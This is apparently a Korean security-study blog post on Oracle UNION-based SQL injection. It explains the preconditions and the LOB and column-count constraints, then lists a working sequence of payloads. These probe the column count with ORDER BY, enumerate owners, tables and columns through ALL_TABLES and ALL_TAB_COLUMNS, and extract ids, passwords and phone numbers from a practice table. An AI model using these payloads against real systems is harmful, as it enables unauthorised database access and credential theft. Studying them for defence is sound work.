์ƒˆ์†Œ์‹

์ธ๊ธฐ ๊ฒ€์ƒ‰์–ด

๐Ÿ“  Secure

ORACLE Union Based

  • -
๋ฐ˜์‘ํ˜•

Union ๊ธฐ๋ฐ˜ SQL ๊ตฌ๋ฌธ์„ ์ „์†กํ•˜๊ณ  ๊ณต๊ฒฉ์ž๊ฐ€ ์˜๋„ํ•œ ๋ฐ์ดํ„ฐ๋ฅผ ๋ฐ›๋Š” ๊ณต๊ฒฉ

 

1. ์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ์กฐ๊ฑด

์‚ฌ์šฉ์ž ์ž…๋ ฅ๊ฐ’์„ ํ†ตํ•ด ์™„์„ฑ๋œ ์ปค๋ฆฌ๋กœ ๋ฐ์ดํ„ฐ๊ฐ€ DB์—์„œ ๋ฐ˜ํ™˜๋˜์–ด์•ผ ํ•œ๋‹ค

 

2. ๋‹ค์–‘ํ•œ ์ œ์•ฝ ์กฐ๊ฑด

๋Œ€์šฉ๋Ÿ‰ ๋ฐ์ดํ„ฐ ํƒ€์ž…์€ ์ค‘๋ณต ์ œ๊ฑฐ๊ฐ€ ๋ถˆ๊ฐ€๋Šฅํ•˜๋‹ค ( ๋‹จ, MYSQL ์˜ˆ์™ธ )

๋Œ€์šฉ๋Ÿ‰ ๋ฐ์ดํ„ฐ ํƒ€์ž…์€ ์ •๋ ฌ์ด ๋ถˆ๊ฐ€๋Šฅํ•˜๋‹ค ( ๋‹จ, MYSQL ์˜ˆ์™ธ )

ํ•˜์œ„ SELECT ์ ˆ์˜ ์ปฌ๋Ÿผ ๊ฐœ์ˆ˜๋Š” ๋ฐ˜๋“œ์‹œ ์ƒ์œ„ SELECT ์ปฌ๋Ÿผ ๊ฐœ์ˆ˜์™€ ์ผ์น˜ํ•ด์•ผํ•œ๋‹ค.

Union์œผ๋กœ ์กฐํšŒํ•˜๋ ค๋Š” ๋ฐ์ดํ„ฐ์™€ ์ถ”์ถœํ•˜๋ ค๊ณ  ํ•˜๋Š” ๋ฐ์ดํ„ฐ์˜ ํƒ€์ž…์ด ์ผ์น˜ํ•ด์•ผํ•œ๋‹ค( ๋‹จ,MYSQL ์˜ˆ์™ธ )

 

MYSQL์—์„œ ์‚ฌ์šฉํ•˜๋Š” ๋Œ€์šฉ๋Ÿ‰ ํƒ€์ž… : text, ntext,image ๋“ฑ

ORACLE์—์„œ ์‚ฌ์šฉํ•˜๋Š” ๋Œ€์šฉ๋Ÿ‰ ํƒ€์ž… : clob , nclob, bolob ๋“ฑ

 

Union๊ณผ Union All ์ฐจ์ด์ 

Union : ์ค‘๋ณต ์ œ๊ฑฐ ๊ธฐ๋Šฅ์ด ํฌํ•จ

Union All : ์ค‘๋ณต ์ œ๊ฑฐ ๊ธฐ๋Šฅ์ด ๋ถˆ ํฌํ•จ

 

Union Based๊ฐ€ ๋ถˆ๊ฐ€๋Šฅํ•œ ๊ณต๊ฒฉ๋“ค

- ID ์ค‘๋ณต ์กฐํšŒ ๊ธฐ๋Šฅ : ์•„์ด๋”” ์ค‘๋ณต์กฐํšŒ ๊ฐ™์€ ๊ฒฝ์šฐ DB ๋ฐ˜ํ™˜๊ฐ’์ด ์•„๋‹Œ ์„œ๋ฒ„ ๋ฐ˜ํ™˜๊ฐ’ > Union BAsed ๊ณต๊ฒฉ์ด ๋ถˆ๊ฐ€๋Šฅ

[ ์‚ฌ์šฉํ•  ์ˆ˜ ์—†๋Š” ์•„์ด๋”” ์ž…๋‹ˆ๋‹ค ] : ์„œ๋ฒ„ ๋ฐ˜ํ™˜ ๊ฐ’ > Union ๊ณต๊ฒฉ ๋ถˆ๊ฐ€๋Šฅ

['kitri' ๊ณ„์ •์€ ์ด๋ฏธ ์กด์žฌํ•˜๋Š” ๊ณ„์ • ์ž…๋‹ˆ๋‹ค.] : DB ๋ฐ˜ํ™˜ ๊ฐ’ > Union ๊ณต๊ฒฉ ๊ฐ€๋Šฅ

ID : kitri [์ค‘๋ณต์กฐํšŒ]
์•Œ๊ณ ๋ฆฌ์ฆ˜
1. SELECT id FROM table WHERE id='kitri'
2. if๋ฌธ์œผ๋กœ 1๊ฐœ์˜ ์ปฌ๋Ÿผ์ด ๋‚˜์˜ฌ ๊ฒฝ์šฐ >  [ 'kitri' ๊ณ„์ •์€ ์ด๋ฏธ ์กด์žฌํ•˜๋Š” ๊ณ„์ •์ž…๋‹ˆ๋‹ค. ]
3. if๋ฌธ์œผ๋กœ 0๊ฐœ์˜ ์ปฌ๋Ÿผ์ด ๋‚˜์˜ฌ ๊ฒฝ์šฐ > [ ์‚ฌ์šฉ ๊ฐ€๋Šฅํ•œ ๊ณ„์ •์ž…๋‹ˆ๋‹ค. ]

๊ณต๊ฒฉ ํ”„๋กœ์„ธ์Šค

1. Order By์ ˆ๋กœ ๊ตฌ๋ฌธ ์‹คํ–‰ ํ™•์ธ

2. Union ์ ˆ๋กœ ๊ตฌ๋ฌธ ์‹คํ–‰ ํ™•์ธ

3. ์ถœ๋ ฅ ํฌ์ง€์…˜์„ ํŒŒ์•…

 

' order by 3 --
' order by 7 --
# 3๋ฒˆ ํ•ญ๋ชฉ์€ ๋Œ€์šฉ๋Ÿ‰ ํƒ€์ž…์ด๊ณ , 7๊ฐœ์˜ ์ปฌ๋Ÿผ์„ ๊ฐ€์ง€๊ณ  ์žˆ๋‹ค

์—๋Ÿฌ

# Union ์ค‘๋ณต ์ œ๊ฑฐ๋ฅผ ํ•˜๊ธฐ ๋•Œ๋ฌธ์— 3๋ฒˆ์งธ ์ปฌ๋Ÿผ์ด ๋Œ€์šฉ๋Ÿ‰ ํƒ€์ž…์ด๋ผ ๋ถˆ๊ฐ€๋Šฅ
' Union SELECT null,null,null,null,null,null,null FROM dual --

# ์˜ค๋ฅ˜ ๊ณ ์น˜๊ธฐ
' Union All SELECT null,null,null,null,null,null,null FROM dual --

# ๋ฐ์ดํ„ฐ ํƒ€์ž…์ด ์ผ์น˜ํ•˜์ง€ ์•Š์Œ > ์˜ค๋ฅ˜
' Union All SELECT '1',null,null,null,null,null,null FROM dual --

# ์˜ค๋ฅ˜ ๊ณ ์น˜๊ธฐ
' Union All SELECT 1,null,null,null,null,null,null FROM dual --

# ์ถœ๋ ฅ ๊ฐ€๋Šฅํ•œ ํฌ์ง€์…˜ ํ™•์ธ
'and 1=2 Union All SELECT 1,'2',null,'4',null,null,null FROM dual --

'and 1=2 Union All SELECT DISTINCT 1,owner,null,'4',null,null,null FROM ALL_tables --
# ๋Œ€์šฉ๋Ÿ‰ ํƒ€์ž…์ด ์ค‘๋ณต์ œ๊ฑฐ๊ฐ€ ๋˜์–ด ์—๋Ÿฌ ๋ฐœ์ƒ

# ์‚ฌ์šฉ์ž ์ด๋ฆ„ ๋ชฉ๋กํ™” ์ค‘๋ณต ์ œ๊ฑฐ
'and 1=2 Union All SELECT 1,owner,null,'4',null,null,null FROM (SELECT DISTINCT owner FROM ALL_tables) --

# table_name๊ณผ owner ์ค‘๋ณต ์ œ๊ฑฐ ํ›„ ์ถœ๋ ฅ
'and 1=2 Union All SELECT 1,owner,null,table_name,null,null,null FROM (SELECT DISTINCT owner,table_name FROM ALL_tables) --

# ํ…Œ์ด๋ธ” ๋ชฉ๋กํ™” > ํ…Œ์ด๋ธ”์€ ์ค‘๋ณต์ด ๋˜์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์— ์ค‘๋ณต ์ œ๊ฑฐ ํ•  ํ•„์š”๊ฐ€ ์—†๋‹ค
'and 1=2 Union All SELECT 1,table_name,null,'4',null,null,null FROM all_tables WHERE owner='C##TEST' --

# ์ปฌ๋Ÿผ ๋ชฉ๋กํ™”
'and 1=2 Union All SELECT 1,column_name,null,'4',null,null,null FROM all_tab_columns WHERE owner='C##TEST' and table_name='TEST1' --

# ๋ฐ์ดํ„ฐ ๋ชฉ๋กํ™”
'and 1=2 Union All SELECT idx,id,null,pw,null,null,null FROM C##TEST.TEST1 --

 

# ์—ฐ๊ฒฐ ์—ฐ์‚ฐ์ž ์‚ฌ์šฉํ•˜์—ฌ ์—ฌ๋Ÿฌ ๋ฐ์ดํ„ฐ ํ•ฉ์ณ์„œ ์กฐํšŒํ•˜๊ธฐ
'and 1=2 Union All SELECT idx,id||'#####'||pw,null,phone,null,null,null FROM C##TEST.TEST1 --
๋ฐ˜์‘ํ˜•

'๐Ÿ“  Secure' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

SQL Injection - Error Based  (0) 2022.07.06
Oracle Blind Based  (0) 2022.07.06
Oracle database ๊ณต๊ฒฉ ์‹ค์Šต  (0) 2022.07.05
ORACLE INJECTION  (0) 2022.07.05
Blind Injection -2  (0) 2022.07.04
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.